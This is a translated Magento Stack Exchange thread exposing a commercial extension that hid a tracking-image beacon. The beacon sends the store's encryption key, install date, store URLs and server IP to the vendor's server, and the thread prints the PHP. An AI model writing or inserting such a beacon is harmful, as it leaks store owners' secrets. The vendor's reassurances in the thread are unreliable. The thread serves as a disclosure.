Czy jest jakiś dobry powód, aby moduł miał dostęp do globalnego / kryptograficznego / klucza zdalnego?

19

Wybacz moją ignorancję, ale klucz szyfrujący służy do odszyfrowywania danych Magento, prawda? Czy jest jakiś dobry powód, aby moduł miał do niego dostęp? Natknąłem się na ten kod po zainstalowaniu Advanced Content Manager ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

TylersSN
źródło
3
TO. JEST. OKROPNY. Nie ma powodu do wycieku klucza szyfrującego.
Fabian Blechschmidt
1
To źle, bardzo źle.
Anna Völkl,
1
Dobry chwyt! To bardzo źle ...
Sander Mangel
1
Dzięki @Sander za poinformowanie nas. Został usunięty z Connect.
wykorzystuje
1
@benmarks miło to słyszeć. Jest to bardzo rozczarowujące z oczywistych powodów, a także dlatego, że aplikacja była bardzo imponująca, a programista był bardzo pomocny i szybki w przeszłości.
TylersSN,

Odpowiedzi:

11

Tak ... jest dobry powód.
Chcą to wiedzieć i zalogować, na wszelki wypadek. :)

Powinieneś odinstalować rozszerzenie (najprawdopodobniej już to zrobiłeś). Nigdy nie należy używać rozszerzeń, które „dzwonią do domu”, bez względu na to, jakie dane wysyłają do domu.

Możesz wymienić tutaj rozszerzenie, aby inni mogli je zobaczyć: Zabawny / Bezużyteczny / Okropny kod z Magento Extensions

Marius
źródło
1
„dzwoniąc do domu” niestety wykonuje wiele modułów. Robią to również Amasty i Aheadworks: \
Sander Mangel
4
Tego gist.github.com/miguelbalparda/b57a47a010a5995bc44d można użyć do sprawdzenia globalnego / crypt / klucza z interfejsu CLI we wszystkich folderach oprócz aplikacji / kodu / rdzenia.
mbalparda
Więc nie tylko są w stanie odszyfrować dane CC (dobrze, że tego nie zapisuję) hasła itp. Ale zapłaciłem za nie 300 USD. Właśnie to należy opublikować w Funny.
TylersSN,
1
@iUseMagentoNow. To zabawne „och”, a nie śmieszne „ha ha”. Powinieneś poprosić o zwrot pieniędzy.
Marius
8

Otrzymaliśmy dzisiaj prośbę o wsparcie dotyczące tej funkcji. Rozwiązaliśmy już ten problem i usunęliśmy ten fragment kodu. Nowa wersja jest dostępna dla wszystkich naszych klientów w strefie klientów (za darmo, ponieważ oferujemy nieograniczoną aktualizację).

Wiem, że musimy to uzasadnić, więc zróbmy to:

  • Celem tego modułu śledzącego było TYLKO śledzenie nieautoryzowanego użycia naszego rozszerzenia.
  • Moduł śledzący był wyświetlany tylko w obszarze administracyjnym (żaden z Twoich klientów ani nikt inny niż ty i my nie byliśmy w stanie go zobaczyć).
  • Usunęliśmy to również w naszym DB.
  • Kluczem jest tylko szyfrowanie hasła administratora. Ponieważ używamy do współpracy z wami wszystkimi próśb o wsparcie, być może już wysłaliście nam poświadczenia e-mailem w celu uzyskania pomocy. Gdybyśmy chcieli twojego hasła, wysłalibyśmy je bezpośrednio ... To nie był cel.
  • Nawet z kluczem hasło jest nadal szyfrowane. I magento admin blokuje użytkownika po kilku próbach.

Zdajemy sobie sprawę, że to pomyłka, i to jest siła społeczności i systemu open source: możemy naprawić i poprawić znacznie szybciej. Dziękujemy wszystkim za powiadomienie, dołożymy teraz większego wysiłku w zakresie podatności na zagrożenia.

Zaawansowany menedżer treści
źródło
3
+1 za podjęcie starań, aby odpowiedzieć tutaj publicznie na Magento SE!
7ochem
2
Nieautoryzowane użycie rozszerzenia ?! Możesz po prostu użyć do tego domeny.
mbalparda